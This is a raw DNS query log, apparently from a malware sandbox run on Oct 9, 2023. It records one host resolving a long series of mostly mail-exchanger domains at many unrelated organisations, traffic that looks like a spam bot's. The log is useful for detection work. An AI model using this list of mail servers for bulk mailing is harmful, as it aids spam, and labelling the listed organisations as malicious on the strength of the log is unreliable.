                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.035674095 CEST192.168.2.31.1.1.10x725fStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.206408024 CEST192.168.2.31.1.1.10x2754Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.341188908 CEST192.168.2.31.1.1.10x43a9Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.378505945 CEST192.168.2.3193.206.141.380x2f13Standard query (0)mx-05.uniroma2.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.380186081 CEST192.168.2.3192.12.94.300x2f13Standard query (0)w017197b.kasserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.380192995 CEST192.168.2.31.1.1.10x1c99Standard query (0)zelda.ns.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.547931910 CEST192.168.2.3108.162.192.2420xd217Standard query (0)mail.ryico.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.547957897 CEST192.168.2.3104.47.38.80xd217Standard query (0)rcm-at.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.549742937 CEST192.168.2.3192.12.94.300xd217Standard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.549742937 CEST192.168.2.3156.154.132.2000xd217Standard query (0)mail.ebtnet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.551568031 CEST192.168.2.3192.12.94.300xd217Standard query (0)mx1.hostinger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.551634073 CEST192.168.2.3200.68.105.1010xd217Standard query (0)mail.p-per.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.554049015 CEST192.168.2.3104.47.38.80xd217Standard query (0)uniparthenope-it.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.560539007 CEST192.168.2.3208.84.67.2080x9819Standard query (0)mxa-001c3202.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.563041925 CEST192.168.2.3137.118.1.280x9819Standard query (0)dcdi-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.563040972 CEST192.168.2.3156.154.132.2000x9819Standard query (0)mx02.xnote.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.563041925 CEST192.168.2.3192.12.94.300x9819Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.564848900 CEST192.168.2.3137.118.1.280x9819Standard query (0)dcdi-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.564848900 CEST192.168.2.3156.154.132.2000x9819Standard query (0)mx02.xnote.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.108289957 CEST192.168.2.3149.112.112.1120xf12cStandard query (0)prtcnetmx.prtcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.109321117 CEST192.168.2.3149.112.112.1120xf12cStandard query (0)mx2.mail.ovh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.109324932 CEST192.168.2.39.9.9.90xf12cStandard query (0)mx01.naspers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.110306978 CEST192.168.2.3149.112.112.1120xf12cStandard query (0)cpacanada-ca.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.110307932 CEST192.168.2.3149.112.112.1120xf12cStandard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.122499943 CEST192.168.2.3149.112.112.1120x2dStandard query (0)lbconstructioninc.com.mx1.rcimx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.123094082 CEST192.168.2.3208.67.222.2220x2dStandard query (0)mail.culver.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.123613119 CEST192.168.2.3208.67.222.2220x2dStandard query (0)fojab-se.mx1.staysecuregroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.124176979 CEST192.168.2.3208.67.222.2220x2dStandard query (0)mx3.alien8.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.124660015 CEST192.168.2.3208.67.222.2220x2dStandard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.125181913 CEST192.168.2.39.9.9.90x2dStandard query (0)domenicamato.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.125648975 CEST192.168.2.31.0.0.10x2dStandard query (0)mail.eilhk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.127198935 CEST192.168.2.31.1.1.10x2dStandard query (0)foodallergy-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.127199888 CEST192.168.2.38.8.4.40x2dStandard query (0)publicms1.mail2world.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.127931118 CEST192.168.2.3208.67.222.2220x2dStandard query (0)mailin-01.mx.sonic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.138170958 CEST192.168.2.3208.67.220.2200x102dStandard query (0)mymail.markerman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.138606071 CEST192.168.2.38.8.4.40xd52eStandard query (0)mail.lb.auchan.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.139713049 CEST192.168.2.38.8.8.80xd52eStandard query (0)sc133.sgcloudhosting.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.140117884 CEST192.168.2.3208.67.222.2220xd52eStandard query (0)mx100.nn.hrA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.140635014 CEST192.168.2.38.8.8.80xd52eStandard query (0)mxb-00115402.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.141143084 CEST192.168.2.3149.112.112.1120xd52eStandard query (0)relay.coreconsulting.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.142065048 CEST192.168.2.39.9.9.90xd52eStandard query (0)idealtile.com.2.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.142065048 CEST192.168.2.39.9.9.90xd52eStandard query (0)peoplescom-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.142939091 CEST192.168.2.31.0.0.10xd52eStandard query (0)mxa-00181c02.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.142941952 CEST192.168.2.31.1.1.10xd52eStandard query (0)ms2.mail2world.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.154469967 CEST192.168.2.3208.67.220.2200xe52eStandard query (0)mail.trinom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.155194044 CEST192.168.2.31.1.1.10xe52eStandard query (0)mx.breakthur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.156749010 CEST192.168.2.3149.112.112.1120xe52eStandard query (0)scanner1.bvcaa.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.157278061 CEST192.168.2.3208.67.222.2220x142fStandard query (0)mail.glasslam-asia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.158088923 CEST192.168.2.31.0.0.10x142fStandard query (0)mail.gsl-th.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.158088923 CEST192.168.2.31.0.0.10x142fStandard query (0)mail.resumesrv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.159013987 CEST192.168.2.3208.67.220.2200x142fStandard query (0)netoverdrive-com-au.p10.mxthunder.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.159014940 CEST192.168.2.3149.112.112.1120x142fStandard query (0)comstarauto-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.159555912 CEST192.168.2.38.8.4.40x142fStandard query (0)mxb-0006de01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.169753075 CEST192.168.2.38.8.4.40x232fStandard query (0)li585-225.members.linode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.170280933 CEST192.168.2.31.0.0.10x232fStandard query (0)mail.sequere.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.170767069 CEST192.168.2.39.9.9.90x232fStandard query (0)mx01.nicmail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.171231031 CEST192.168.2.3149.112.112.1120x232fStandard query (0)mx3c40.carrierzone.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.172051907 CEST192.168.2.3149.112.112.1120x232fStandard query (0)mx0a-00170501.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.172053099 CEST192.168.2.3208.67.220.2200x232fStandard query (0)fsr-mx.email-protect.gosecure.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.172502995 CEST192.168.2.39.9.9.90x232fStandard query (0)mail.balkam-group.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.172930002 CEST192.168.2.3208.67.220.2200x232fStandard query (0)fwd1.porkbun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.173377037 CEST192.168.2.3208.67.222.2220x232fStandard query (0)mail.gwyneddwealthpartners.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.173754930 CEST192.168.2.38.8.4.40x232fStandard query (0)custmx.cscdns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.186440945 CEST192.168.2.3208.67.220.2200x332fStandard query (0)mx.leonet.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.186440945 CEST192.168.2.3208.67.222.2220x332fStandard query (0)mail.mailinator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.187527895 CEST192.168.2.38.8.8.80x332fStandard query (0)sgcm-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.187530041 CEST192.168.2.31.1.1.10x332fStandard query (0)mail.meta-lab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.188071966 CEST192.168.2.3149.112.112.1120x332fStandard query (0)fallsburgny.com.1.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.202363968 CEST192.168.2.31.0.0.10x831Standard query (0)mail3.ocel.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.202367067 CEST192.168.2.31.1.1.10x831Standard query (0)cluster-h.mailcontrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.435108900 CEST192.168.2.31.1.1.10xda99Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.674006939 CEST192.168.2.31.1.1.10x47a5Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.811203003 CEST192.168.2.3149.112.112.1120x6f4cStandard query (0)volny-cz-20mx1.eco-mx.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.811228037 CEST192.168.2.38.8.8.80x6f4cStandard query (0)nomatech-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.811899900 CEST192.168.2.38.8.4.40x6f4cStandard query (0)mx1.active24.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.812333107 CEST192.168.2.3208.67.220.2200x6f4cStandard query (0)mxa-0010b102.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.812768936 CEST192.168.2.3208.67.222.2220x6f4cStandard query (0)mx1.active24.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.826309919 CEST192.168.2.3149.112.112.1120x7f4cStandard query (0)mx1.mail.ovh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.826607943 CEST192.168.2.38.8.8.80x7f4cStandard query (0)adlerlacke-com01c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.827052116 CEST192.168.2.38.8.8.80x7f4cStandard query (0)mxa-00620701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.827621937 CEST192.168.2.3208.67.220.2200x7f4cStandard query (0)mx1.orcon.net.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.828063965 CEST192.168.2.3208.67.220.2200x7f4cStandard query (0)hsmx149.cn4e.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.828564882 CEST192.168.2.38.8.4.40x7f4cStandard query (0)tph-ca.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.829555988 CEST192.168.2.31.0.0.10x7f4cStandard query (0)uk.mx1.mailanyone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.830465078 CEST192.168.2.39.9.9.90x7f4cStandard query (0)antispam.solunet.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.830785990 CEST192.168.2.38.8.8.80x7f4cStandard query (0)w01a08c1.kasserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.841506004 CEST192.168.2.3149.112.112.1120x8e4cStandard query (0)mailex.2980.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.841941118 CEST192.168.2.31.1.1.10x8e4cStandard query (0)mail51.gullestrupnet.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.843595028 CEST192.168.2.31.1.1.10x8e4cStandard query (0)ftcispnet-mx.email-protect.gosecure.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.843642950 CEST192.168.2.31.0.0.10x8e4cStandard query (0)d160221b.ess.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.844322920 CEST192.168.2.38.8.4.40x8e4cStandard query (0)mail.telecompost.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.844819069 CEST192.168.2.38.8.8.80x8e4cStandard query (0)mx2.hostinger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.845330000 CEST192.168.2.31.0.0.10x8e4cStandard query (0)mx-01.eapps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.845952034 CEST192.168.2.31.1.1.10x8e4cStandard query (0)thehealthline-ca.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.846729040 CEST192.168.2.3208.67.220.2200x8e4cStandard query (0)mail.pangea.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.857027054 CEST192.168.2.38.8.8.80x634eStandard query (0)mail.nhs.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.857717991 CEST192.168.2.3149.112.112.1120x924eStandard query (0)mail.yaxmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.859364033 CEST192.168.2.3149.112.112.1120x924eStandard query (0)w4.aerospaceemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.859977007 CEST192.168.2.31.0.0.10x924eStandard query (0)mx-in01.eu.retarus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.860487938 CEST192.168.2.38.8.4.40x924eStandard query (0)relay.mx.skynet.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.861797094 CEST192.168.2.31.1.1.10x924eStandard query (0)mxa-00160c04.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.861797094 CEST192.168.2.31.1.1.10x924eStandard query (0)mx.voiaj.mdA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.872967005 CEST192.168.2.3208.67.222.2220xa24eStandard query (0)swc-tx-com.mx1-us.mailanyone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.873621941 CEST192.168.2.38.8.8.80xa24eStandard query (0)mx3-hosting.jellyfish.systemsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.874450922 CEST192.168.2.3208.67.222.2220xa24eStandard query (0)mxb-001ba701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.876072884 CEST192.168.2.3208.67.222.2220xa24eStandard query (0)mxa-00168f01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.877108097 CEST192.168.2.3208.67.220.2200xa24eStandard query (0)w017197b.kasserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.439093113 CEST192.168.2.31.1.1.10x64daStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.467072010 CEST192.168.2.31.1.1.10x5f6eStandard query (0)rcm-at.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.481564045 CEST192.168.2.31.0.0.10x6e6eStandard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.482440948 CEST192.168.2.31.1.1.10x6e6eStandard query (0)uniparthenope-it.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.482454062 CEST192.168.2.3208.67.220.2200x6e6eStandard query (0)mx1.hostinger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.482955933 CEST192.168.2.3149.112.112.1120x6e6eStandard query (0)mxa-001c3202.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.689191103 CEST192.168.2.31.1.1.10x47a5Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.895402908 CEST192.168.2.31.1.1.10x91a5Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.929620028 CEST192.168.2.31.1.1.10x1ba2Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.200921059 CEST192.168.2.31.1.1.10xc0eStandard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.279535055 CEST192.168.2.31.1.1.10x3592Standard query (0)lisa.neostrada.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.456581116 CEST192.168.2.31.1.1.10xf178Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.482151985 CEST192.168.2.31.1.1.10xec76Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.577162981 CEST192.168.2.366.228.38.1670x86b3Standard query (0)mail.vlad.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.581885099 CEST192.168.2.3192.12.94.300x86b3Standard query (0)srv4.rejecthost.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.599673033 CEST192.168.2.3208.84.67.2080x95b3Standard query (0)mx0a-001a4e01.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.600923061 CEST192.168.2.3213.251.128.1290x89b5Standard query (0)mx3.ovh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.602313995 CEST192.168.2.3212.109.32.150x89b5Standard query (0)mx4.svitonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.685137987 CEST192.168.2.31.1.1.10x47a5Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.826992035 CEST192.168.2.374.202.142.1620xe1d0Standard query (0)mx1.spray.mail2world.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.828129053 CEST192.168.2.3192.12.94.300xe1d0Standard query (0)qiye163mx01.mxmail.netease.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.841336966 CEST192.168.2.3162.251.82.1220xd5d2Standard query (0)deepakfasteners.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.842838049 CEST192.168.2.31.1.1.10xe698Standard query (0)ns1-proddns.glbdns.o365filtering.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.007416964 CEST192.168.2.3104.47.118.1450x5de6Standard query (0)paradigma-biz.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.009063005 CEST192.168.2.3104.47.118.1450x5de6Standard query (0)rightstartmortgage-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.011446953 CEST192.168.2.345.142.220.390x5de6Standard query (0)mailgw02.host.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.011446953 CEST192.168.2.3195.243.137.260x5de6Standard query (0)mail.aspea.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.217180014 CEST192.168.2.31.1.1.10x69f4Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.217478991 CEST192.168.2.31.1.1.10xb501Standard query (0)srv4.rejecthost.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.265116930 CEST192.168.2.3104.47.118.1450x9107Standard query (0)victoriamansion-org.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.267329931 CEST192.168.2.3162.159.24.1980x9107Standard query (0)rjii.net.1.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.268929005 CEST192.168.2.3192.31.80.300x9107Standard query (0)iaxs.net.mx1.visi.rcimx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.270283937 CEST192.168.2.3192.12.94.300x9107Standard query (0)mx2.hc815-95.ap.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.467027903 CEST192.168.2.3149.112.112.1120xf520Standard query (0)qiye163mx01.mxmail.netease.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.469182014 CEST192.168.2.38.8.4.40xf520Standard query (0)deepakfasteners.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.482455969 CEST192.168.2.31.0.0.10xe922Standard query (0)mailgw02.host.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.482961893 CEST192.168.2.31.1.1.10xe922Standard query (0)mail.aspea.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.563348055 CEST192.168.2.31.1.1.10x469Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.624525070 CEST192.168.2.31.1.1.10xb2daStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.779540062 CEST192.168.2.3149.112.112.1120x548Standard query (0)mx2.hc815-95.ap.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.779544115 CEST192.168.2.31.1.1.10x548Standard query (0)iaxs.net.mx1.visi.rcimx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.875777006 CEST192.168.2.31.1.1.10x9acStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.028613091 CEST192.168.2.31.1.1.10xf0e9Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.045223951 CEST192.168.2.3192.12.94.300x3969Standard query (0)yunmx.263xmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.046057940 CEST192.168.2.3192.12.94.300x3969Standard query (0)mx120.mb5p.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.047339916 CEST192.168.2.3104.47.118.1450x3969Standard query (0)whitemc-it.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.171114922 CEST192.168.2.31.1.1.10xdf5aStandard query (0)ns-ut7.proofpoint.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.329540014 CEST192.168.2.31.1.1.10x3f33Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.387697935 CEST192.168.2.3148.163.128.500x3194Standard query (0)mxb-00752701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.404010057 CEST192.168.2.3192.31.80.300x2596Standard query (0)bsf2.dc-uoit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.405128956 CEST192.168.2.3198.41.0.40x2596Standard query (0)bettzedek-org.inbound.emailservice.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.406097889 CEST192.168.2.31.1.1.10xa2e4Standard query (0)ns23.superhosting.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.420259953 CEST192.168.2.31.1.1.10xbe44Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.641518116 CEST192.168.2.31.1.1.10xfe0cStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.705624104 CEST192.168.2.391.196.124.120x41bbStandard query (0)vision-bg.comA (IP address)IN (0x0001)false
